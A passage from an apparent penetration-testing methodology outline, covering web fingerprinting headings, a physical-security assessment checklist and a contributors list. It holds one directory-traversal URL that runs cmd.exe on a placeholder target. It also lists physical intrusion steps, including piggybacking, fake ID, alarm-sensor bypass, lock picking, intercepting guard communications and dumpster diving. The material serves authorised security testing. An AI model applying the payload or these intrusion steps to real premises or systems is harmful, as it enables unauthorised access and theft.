Content-Type: text/plain
Content-Length: 6

27.4.3. Scans

27.4.4. Fingerprinting

27.4.4.1. Other

27.4.4.2. HTTP

27.4.4.2.1. Commands

27.4.4.2.2. Modules

27.4.4.2.3. File Extensions

27.4.4.3. HTTPS

27.4.4.3.1. Commands

27.4.4.3.2. Commands

27.4.4.3.3. File Extensions

27.4.5. Directory Traversal

27.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

28. Physical Security

28.1. Building Security

28.1.1. Meeting Rooms

28.1.1.1. Check for active network jacks.

28.1.1.2. Check for any information in room.

28.1.2. Lobby

28.1.2.1. Check for active network jacks.

28.1.2.2. Does receptionist/guard leave lobby?

28.1.2.3. Accessible printers? Print test page.

28.1.2.4. Obtain phone/personnel listing.

28.1.3. Communal Areas

28.1.3.1. Check for active network jacks.

28.1.3.2. Check for any information in room.

28.1.3.3. Listen for employee conversations.

28.1.4. Room Security

28.1.4.1. Resistance of lock to picking.

28.1.4.1.1. What type of locks are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?

28.1.4.2. Ceiling access areas.

28.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

28.1.5. Windows

28.1.5.1. Check windows/doors for visible intruder alarm sensors.

28.1.5.2. Check visible areas for sensitive information.

28.1.5.3. Can you video users logging on?

28.2. Perimeter Security

28.2.1. Fence Security

28.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

28.2.2. Exterior Doors

28.2.2.1. If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored etc.

28.2.3. Guards

28.2.3.1. Patrol Routines

28.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

28.2.3.2. Communications

28.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physical intrusion.

28.3. Entry Points

28.3.1. Guarded Doors

28.3.1.1. Piggybacking

28.3.1.1.1. Attempt to closely follow employees into the building without having to show valid credentials.

28.3.1.2. Fake ID

28.3.1.2.1. Attempt to use fake ID to gain access.

28.3.1.3. Access Methods

28.3.1.3.1. Test 'out of hours' entry methods

28.3.2. Unguarded Doors

28.3.2.1. Identify all unguarded entry points.

28.3.2.1.1. Are doors secured?

28.3.2.1.2. Check locks for resistance to lock picking.

28.3.3. Windows

28.3.3.1. Check windows/doors for visible intruder alarm sensors.

28.3.3.1.1. Attempt to bypass sensors.

28.4. Office Waste

28.4.1. Dumpster Diving - Attempt to retrieve any useful information from ToE refuse. This may include: printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs etc.

29. Final Report - template

30. Contributors

30.1. Matt Byrne (WirelessDefence.org)

30.1.1. Matt contributed the majority of the Wireless section.

30.2. Arvind Doraiswamy (Paladion.net)

30.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

30.3. Lee Lawson (Dns.co.uk)

30.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

30.4. Nabil OUCHN (Security-database.com)